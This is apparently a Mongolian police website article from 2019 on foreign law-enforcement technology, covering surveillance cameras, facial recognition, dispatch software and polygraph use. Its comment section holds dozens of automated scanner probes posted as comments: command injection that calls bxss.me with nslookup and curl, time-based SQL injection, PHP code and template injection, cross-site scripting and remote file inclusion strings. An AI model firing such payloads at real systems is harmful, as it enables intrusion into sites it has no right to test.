• Нүүр хуудас
  • Харьяа нэгжүүд
  • Холбоо барих
  • Асуулт хариулт

Гадаад орны хууль сахиулах байгууллагад ашиглагдаж буй техник, технологийн талаар

2019-03-27

ГАДААД ОРНЫ ХУУЛЬ САХИУЛАХ БАЙГУУЛЛАГАД
АШИГЛАГДАЖ БУЙ ТЕХНИК, ТЕХНОЛОГИЙН ТАЛААР
 

CCTV 

Гадаадын зарим орны жишиг туршлагыг судалж үзэхэд камерын систем нь зөөврийн (энгэрийн, явуулын, дронд суурилуулсан гм), хяналтын, дулаан мэдрэгч, смарт буюу хиймэл оюун ухаанд суурилсан зэрэг төрөлжсөн байдлаар ашиглагдаж байна.

  • АНУ, ХБНГУ, Япон, БНСУ, БНХАУ-д эргүүлийн алба хаагч тухайн өдөр ажилласан тайлангаа энгэрийн камерын бичлэгээрээ баталгаажуулдаг. Тодруулбал: эргүүлд ажилласан алба хаагчдын энгэрийн камерын бичлэгүүд тухайн хэлтсийн мэдээллийн санд (бичлэг хадгалах төхөөрөмж)-д 1-6 сар хадгалагддаг.
  • АНУ-ын Нью-Иорк хотын цагдаагийн газар 2012 оны 8 дугаар сард 48 сая долларын өртөг бүхий ухаалаг камерын системийг Майкрософт корпорацийн тусламжтай нэвтрүүлж, уг камер нь өгөгдсөн мэдээллийн дагуу дурын шүүлтийг хийж, байрлал тогтоох зэргээр 19 сая хүн амтай хотыг бүхэлд нь хянах боломжийг олгосон байна.
  • Япон улсын Токио хотын цагдаагийн газар төвлөрсөн камерын системийн тусламжтайгаар хувийн эзэмшлээс бусад газарт сэжигтнийг тасралтгүй дагаж, баримтжуулалт хийдэг. Зөвхөн Токио хотод 14 сая хяналтын камер байдаг. Түүнчлэн зам тээвэр, гудамж талбайд үйлдэгдсэн хэргийн газарт 3D Plotter камерын тусламжтай хэмжилт хийж ослын дүгнэлтийг 3 минутын дотор гаргадаг.
  • Энэ оны 2 дугаар сарын 8-ны өдөр БНХАУ-ын томоохон хотуудын цагдаагийн алба хаагчид хүний нүүрийг таних камерын технологи бүхий шил зүүж эхэлсэн. Энэхүү нүдний шилээр дамжуулан сэжигтний мэдээлэл байгаа дата баазад холбогдоно. Сэжигтний зургийг нүдний шилээрээ авч дотоод дата мэдээллийн бааз руугаа хуулж тэнд байгаа бусад зургуудтай харьцуулдаг энэхүү технологи нэвтэрсэн өдрөө онц хүнд гэмт хэргийн долоон сэжигтнийг олж илрүүлсэн. Үүнээс гадна 26 хүнийг хуурамч “ID” ашиглаж байгааг нь олж илрүүлжээ. Одоогоор БНХАУ-д 170 сая CCTV камер байрлуулсан. Ойрын гурван жилд нэмж 400 саяыг шинээр байрлуулахаар төлөвлөж байгаа. Эдгээр камеруудын ихэнх нь нүүр таних технологи “artificial intelligence” буюу хиймэл оюун ухаанд суурилсан. Түүнчлэн хот доторх камерууд эргэн тойрны 10 км дотор 360 градус эргэж автомашины дугаар, хүний дүр төрхийг танина. Мөн өөр хотуудын сүлжээнд холбогдсон. Жишээ нь Хөх хотоос Эрээн, Харбин хотуудын CCTV системд нэвтэрч ажилладаг.
  • АНУ болон баруун европын орнуудын цагдаагийн байгууллагад “Infrared camera” буюу дулаан мэдрэгч камерийг ашиглан сэжигтний байрлалыг тогтоох, битүү газар /байр, автомашин гм/ байгаа болон уул модонд нуугдсан оргодлыг илрүүлэх, харанхуйд сэжигтний байрлалыг тогтоох, хар тамхины хууль бус лабораторийг илрүүлэх боломжтой болсон.

        Монгол Улсын хувьд анх 2016 онд Улаанбаатар хотод АСЕМ-ийн дээд түвшний 11 дэх уулзалт зохион байгуулах үеэр Испани Улсад үйлдвэрлэгдсэн “Herta security компаний нүүр царай таних төхөөрөмжийг туршилтын байдлаар ашигласан. Энэ төрлийн төхөөрөмж нь хүн ам төвлөрсөн газруудад хүний царайг таних, боловсруулах, цагдаагийн санд байгаа мэдээлэлтэй харьцуулалт хийх, сан үүсгэх зэрэг үйлдлийг гүйцэтгэх хүчин байдаг.

        ГЭМТ ХЭРГИЙН ДУУДЛАГА БҮРТГЭХ ПРОГРАМ

Үндэслэл, ач холбогдол: Гэмт хэргийн дуудлага бүртгэх, мөрдөн шалгах ажиллагаанд дэмжлэг үзүүлэх ухаалаг программ хангамжийг ихэнх улс орнууд нэвтрүүлсэн. Энэ төрлийн программ хангамж АНУ-ын хууль сахиулах байгууллагад хөгжсөн тул дор дурьдсан жишиг туршлагыг судалж төслийг хэрэгжүүлэх боломжтой.

Америкийн нэгдсэн улсад хэрэглэгддэг яаралтай тусламжийн /911/ дуудлага бүртгэх зориулалт бүхий  ProQA for Police”, “CAD” програм хангамж үр дүнтэй байна.

Энэ програм хангамж нь операторт дуудлага хүлээн авснаас эхлэн төгсгөл хүртэл тодорхой алхамын дагуу асуулт, асуултад тохирсон боломжит хариулт, дуудлага өгч буй иргэнд өгөх зөвлөгөө зэрэг мэдээллийг бэлтгэн өгдөг.

CAD програм хангамж нь оператор дуудлагыг хүлээн авах явцдаа харьяа цагдаагийн нэгж байгууллагуудад гэмт хэргийн талаарх мэдээллийг дамжуулах боломжийг бүрдүүлдэг. Ингэснээр иргэнээс ирж буй дуудлагыг цаг алдалгүй хүлээн авч, дуудлагын дагуу ажиллах цагдаагийн алба хаагчдад гэмт хэргийн нөхцөл байдлыг зөвөөр дүгнэж түүнд тохирсон арга хэмжээ авах давуу талыг бий болгодог.

Програм хангамжийн ажиллагааг жишээн дээр тайлбарлаж харуулвал : Оператор дуудлагад нийт 2 мин 44 секунд зарцуулдаг байна. Дуудлага хүлээн авч эхэлснээс хойш 1 минут 02 секундийн дараа гэмт хэргийн үндсэн мэдээлэл харьяа Цагдаагийн нэгжид очиж, хариу арга хэмжээ авах үйл ажиллагаа эхэлдэг.

Операторын дуудлага хүлээн авах ажиллагаа тасралтгүй үргэлжилж гэмт хэргийн нөхцөл байдлыг тодорхой болгох нэмэлт мэдээллүүд үндсэн мэдээлэл дээр нэмэгдэн дуудлагыг хүлээн авч ажиллах алба хаагчдад очдог. Энэ ажиллагаанд 1 минут 42 секундийг зарцуулна. Мөн программ хангамж нь ANI(Automatic Number Identification)/ALI (Automatic Location Identification) мэдээллийн сангаас дуудлага өгч буй утасны эзэмшигчийн талаарх мэдээллийг /хаягийн бүртгэл, утасны дугаар, хаяг, эзэмшигчийн нэр/ автоматаар авч ProQA, CAD программ хангамжуудын харгалзах талбарт утгуудыг бөглөнө оруулдаг. Гэхдээ оператор дээрх мэдээллийг дуудлага өгч буй иргэнээс дахин асууж баталгаажуулдаг.

Гэмт хэргийн мэдээллийг хүлээн авч байх явцдаа цагдаагийн харьяа нэгжүүдэд мэдээллийг дамжуулдаг. Дуудлагад явж буй алба хаагчдад гэмт хэргийн талаарх нөхцөл байдлын нэмэлт мэдээллүүдийг цаг алдалгүй өгдөг.

Давуу тал нь:Операторын дуудлага хүлээн авч, дамжуулах үйл ажиллагааг тодорхой болгон цаг хугацаа хэмнэнэ. Гэмт хэргийн нөхцөл байдлын талаарх бодитой хэрэгцээтэй мэдээлийг дуудлага өгч буй иргэнээс хүлээн авч дараагийн шатанд шилжүүлнэ.

Оператор өөрийн дураар асуулт зохион цаг алдан, гэмт хэргийн нөхцөл байдалд хэрэгцээгүй мэдээллийг цуглуулах шаардлагагүй болно. Дуудлага хүлээн авахаас гадна дуудлага өгч буй иргэнд хэрэгцээтэй зөвлөгөөг өгч цагдаагийн байгууллагын үйлчилгээг утсаар дамжуулан цаг алдалгүй хүргэнэ. Дуудлагад явж буй алба хаагчдад бодит мэдээллийг өгснөөр гэмт хэргийн талаарх нөхцөл байдлыг зөвөөр дүгнэж түүнд тохирсон шийдвэр гаргах боломжийг бүрдүүлнэ.

ПОЛИГРАФ

Үндэслэл, ач холбогдол: Олон Улсын цагдаагийн дарга нарын холбооноос 2016 онд “Полиграф төхөөрөмж ашиглах бодлогын баримт бичиг”-ийг баталж үйл ажиллагаандаа жишиг болгож ашиглахыг улс орнуудын цагдаагийн байгууллагын дарга нарт уриалсан.

Хууль сахиулах байгууллагын хувьд полиграф нь сэжигтний мэдүүлгийг няцаах, нотлох, мөрдөх ажиллагааны чиглэл, цар хүрээг тодорхойлох, шинэ ажилтныг шалгах зэрэг олон зориулалтаар ашиглагдана. Цусны даралт, зүрхний цохилт, амьсгалын хэмнэл, арьсны хариу үйлдэл, биеийн хэлэмж зэрэг тал бүрийн өөрчлөлтийг баримтжуулдаг учраас полиграфыг аль болох түгээмэл хэрэглэхийг Олон Улсын цагдаагийн дарга нарын холбооноос зөвлөмжилсөн. 

Полиграфчийг бэлтгэх, эсхүл энэ төрлийн мэргэжилтэнтэй гэрээ байгуулж ажиллах, полиграфын асуулт боловсруулах, ярилцлага хийх аргачлал, бүдүүвчийг ашиглаж эхлэхийн тулд энэ чиглэлээр багадаа 3 сараас дээш хугацаагаар төсөл үргэлжилнэ. Полиграфийн аргачлалд ямар төрлийн хэрэг, ямар тохиолдолд полиграфыг голлох болон туслах чанартай хэрэглэхийг нарийвчлан зохицуулах зэрэг техник ажлууд багагүй хугацаа зарцуулна. 

Мөрдөх ажиллагааны явцад олж авсан мэдээллийг полиграфаар шалгахын тулд полиграф ярилцлагыг зохион байгуулах мэргэжилтэнд мэдүүлэг, хэргийн газрын үзлэгийн тэмдэглэл, камерын бичлэг зэрэг нотлох баримтуудын талаар мэдээллийг ямар журмаар хэрхэн өгөх, мөн хэргийн нөхцөл байдлаас шалтгаалж алдагдсан эд зүйлсийн байршил, хэрэг үйлдэхэд ашигласан зэвсэг хэрэгсэл, хэргийн газарт үлдээсэн эд мөрийн баримт зэрэгтэй холбоотой асуулт тавихыг хязгаарлах зэрэг нарийвчилсан хэм хэмжээг Цагдаагийн байгууллагын үйл ажиллагааны журамд тусгах шаардлагатай болно.

Түүнчлэн полиграф шалгалт явуулах нь зөвхөн полиграфчийн ажил тул гуравдагч этгээдийг оролцуулах нь тохиромжгүй гэж дүгнэгддэг. Полиграфич нь мэдүүлэг авах хүний биеийн байдал, эмийн хэрэглээ, өвчний түүх зэргийг мэдсэний дараа ярилцлагад оруулах эсэхээ шийдвэрлэнэ. Полиграфич тухайн хэрэгтэй холбоотой ямар асуудлыг хөндөж ярилцах талаар цагдаагийн бусад албан хаагчидтай зөвлөлдсөн байх зэрэг нарийвчилсан журмыг баталж мөрдүүлэх шаардлага үүсч Эрүүгийн процессийн хуульд нийцүүлэх зэрэг техник ажлуудыг төслийн хүрээнд хэрэгжүүлнэ.

Үүнээс гадна полиграф төхөөрөмжийг сонгохдоо дор хаяж 3-н төрлийн бичлэг хийх сувагтай багажийг сонгох, уг төхөөрөмжийн хадгалалт, арчлалт болон аюулгүй байдлыг бүрэн хангах, туршилт ярилцлага явуулсан бүртгэл, түүний үр дүнг цагдаагийн байгууллагын тоо бүртгэлд оруулж байх, полиграфын тусгайлсан өрөөг бэлдэж тохижуулах, өрөөг маш цэвэр, цэгцтэй, аливаа дуу чимээ болон саад болохуйц үзэгдэх орчноос хол байлгах зэрэг зардал мөнгөний шаардлага нэмэгдэнэ. Зах зээлд 1 полиграфын аппаратны дундаж үнэ 8-12 мянган доллар байгаа тул ямар алба, нэгжүүдэд ашиглахаас шалтгаалж нийт санхүүжилтийн нарийн тооцоо гарна.

Сургалтын зардлууд буюу полиграфын асуулга хийх боловсролыг мөрдөгч нарт олгоход сургалтын төвд ирж суралцах томилолтын болон бусад зардал үүсч болно. Тухайлбал: ярилцлагыг хэргийн холбогдолтой асуултын хүрээнд бус тухайн хүний суурь мэдээлэлтэй хамтатган явуулах, полиграфын өмнө байцаалт явуулахыг хориглох, полиграфын үйл явцыг зөвхөн полиграфчаар тайлбарлуулах зэрэг нарийн шаардлагуудыг заавал кредит цагийн хичээлээр олгох шаардлагатай. 

gBqsPxAZ |(nslookup -q=cname hitpgwnngglxz23fa7.bxss.me||curl hitpgwnngglxz23fa7.bxss.me)
2024-02-21 Хариулах
gBqsPxAZ &nslookup -q=cname hitzywygzqynj52295.bxss.me&'\"`0&nslookup -q=cname hitzywygzqynj52295.bxss.me&`'
2024-02-21 Хариулах
gBqsPxAZ ";print(md5(31337));$a="
2024-02-21 Хариулах
gBqsPxAZ &(nslookup -q=cname hittidhishmkc52f49.bxss.me||curl hittidhishmkc52f49.bxss.me)&'\"`0&(nslookup -q=cname hittidhishmkc52f49.bxss.me||curl hittidhishmkc52f49.bxss.me)&`'
2024-02-21 Хариулах
gBqsPxAZ 1QLOfK2BP') OR 947=(SELECT 947 FROM PG_SLEEP(15))--
2024-02-21 Хариулах
gBqsPxAZ (nslookup -q=cname hitlxskttbccl8dbb4.bxss.me||curl hitlxskttbccl8dbb4.bxss.me))
2024-02-21 Хариулах
gBqsPxAZ ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
2024-02-21 Хариулах
gBqsPxAZ $(nslookup -q=cname hitzcztxaojgm867af.bxss.me||curl hitzcztxaojgm867af.bxss.me)
2024-02-21 Хариулах
gBqsPxAZ 1&echo dygztt$()\ ruporh\nz^xyu||a #' &echo dygztt$()\ ruporh\nz^xyu||a #|" &echo dygztt$()\ ruporh\nz^xyu||a #
2024-02-21 Хариулах
gBqsPxAZ"sTYLe='zzz:Expre/**/SSion(xTfs(9206))'bad=" 1
2024-02-21 Хариулах
gBqsPxAZ echo hdvdhj$()\ kzrzyz\nz^xyu||a #' &echo hdvdhj$()\ kzrzyz\nz^xyu||a #|" &echo hdvdhj$()\ kzrzyz\nz^xyu||a #
2024-02-21 Хариулах
gBqsPxAZ 1'||sleep(27*1000)*wdmwgt||'
2024-02-21 Хариулах
gBqsPxAZ '"()
2024-02-21 Хариулах
%67%42%71%73%50%78%41%5A%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%78%54%66%73%28%39%38%34%31%34%29%22 1
2024-02-21 Хариулах
gBqsPxAZ 1-1)) OR 668=(SELECT 668 FROM PG_SLEEP(15))--
2024-02-21 Хариулах
gBqsPxAZ"onmouseover=xTfs(99122)" 1
2024-02-21 Хариулах
${@print(md5(31337))} 1
2024-02-21 Хариулах
gBqsPxAZ" 6X1N=xTfs([!+!]) MCS=" 1
2024-02-21 Хариулах
${@print(md5(31337))}\ 1
2024-02-21 Хариулах
gBqsPxAZ"||sleep(27*1000)*xvvihx||" 1
2024-02-21 Хариулах
gBqsPxAZ Http://bxss.me/t/fit.txt
2024-02-21 Хариулах
gBqsPxAZ 1-1) OR 197=(SELECT 197 FROM PG_SLEEP(15))--
2024-02-21 Хариулах
gBqsPxAZ http://bxss.me/t/fit.txt?.jpg
2024-02-21 Хариулах
dfb__${98991*97996}__::.x 1
2024-02-21 Хариулах
gBqsPxAZ'||sleep(27*1000)*deagor||' 1
2024-02-21 Хариулах
'"() 1
2024-02-21 Хариулах
gBqsPxAZ //xfs.bxss.me?gov.mn
2024-02-21 Хариулах
gBqsPxAZ'&&sleep(27*1000)*qxtczy&&' 1
2024-02-21 Хариулах
gBqsPxAZ 908611
2024-02-21 Хариулах
|(nslookup -q=cname hityjsjkemwsy98485.bxss.me||curl hityjsjkemwsy98485.bxss.me) 1
2024-02-21 Хариулах